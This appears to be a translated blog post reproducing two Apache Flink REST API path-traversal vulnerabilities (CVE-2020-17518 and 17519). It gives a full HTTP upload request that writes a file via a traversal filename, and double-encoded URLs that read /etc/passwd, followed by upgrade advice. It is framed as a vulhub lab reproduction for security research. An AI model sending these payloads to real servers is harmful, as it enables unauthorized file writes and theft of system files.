Apache Flink (File write vulnerability/file read vulnerability)

CVE-2020-17518/17519

I. Vulnerability description

The core of Apache Flink is a streaming data flow execution engine, which provides data distribution, data communication and fault tolerance mechanism for distributed computing of data flow. Flink 1.5.1 introduced the REST API, but there were several flaws in its implementation that resulted in directory traversal.

Cve-2020-17518: File write vulnerability

Using the REST API, an attacker can modify the HTTP header to write the uploaded file anywhere on the local file system (accessible to the Flink 1.5.1 process).

Cve-2020-17519: File read vulnerability

Apache Flink 1.11.0 allows an attacker to read any file (accessible to the JobManager process) on the JobManager local file system through the JobManager process’s REST API.

Second, impact version

Apache Flink 1.5.1 to 1.11.2

Third, vulnerability recurrence

Environment Address:

Github.com/vulhub/vulh…

Cve-2020-17518: File write vulnerability

POST /jars/upload HTTP/1.1 Host: IP:8081 Accept-encoding: gzip, deflate Accept: */* Accept-language: en user-agent: Mozilla / 5.0 (Windows NT 10.0; Win64; X64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Connection: close Content-type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y Content-Length: 189 ------WebKitFormBoundaryoZ8meKnrrso89R6Y Content-Disposition: form-data; name="jarfile"; filename=".. /.. /.. /.. /.. /.. /.. /tmp/sucess" success ------WebKitFormBoundaryoZ8meKnrrso89R6Y--Copy the code

Access: The file is successfully written

http://ip+port/jobmanager/logs/.. %252f.. %252f.. %252f.. %252f.. %252f.. %252f.. %252f.. %252f.. %252f.. %252f.. %252f.. %252ftmp%252fsucessCopy the code

Cve-2020-17519: File read vulnerability

http://IP:PORT/jobmanager/logs/.. %252f.. %252f.. %252f.. %252f.. %252f.. %252f.. %252f.. %252f.. %252f.. %252f.. %252f.. %252fetc%252fpasswdCopy the code

Access path Obtain passwd

4. Repair suggestions

All users can upgrade to Flink 1.11.3 or 1.12.0. The download link is:

Flink.apache.org/downloads.h…

Flink.apache.org/downloads.h…

Reference:

Mp.weixin.qq.com/s/-OFaYj\_C…

Mp.weixin.qq.com/s/DTXc-RiJP…

Disclaimer: This site provides safety tools, procedures (methods) may be offensive, only for safety research and teaching, risk!

Disclaimer: Copyright belongs to the author. Commercial reprint please contact the author for authorization, non-commercial reprint please indicate the source.

Subscribe for more revisited articles and study notes

thelostworld

Safe road, side by side with you !!!!

Personal knowledge: www.zhihu.com/people/fu-w…

Brief personal book: www.jianshu.com/u/bf0e38a8d…

Personal CSDN: blog.csdn.net/qq\_3760279…

Personal blog garden: www.cnblogs.com/thelostworl…

FREEBUF homepage: www.freebuf.com/author/thel…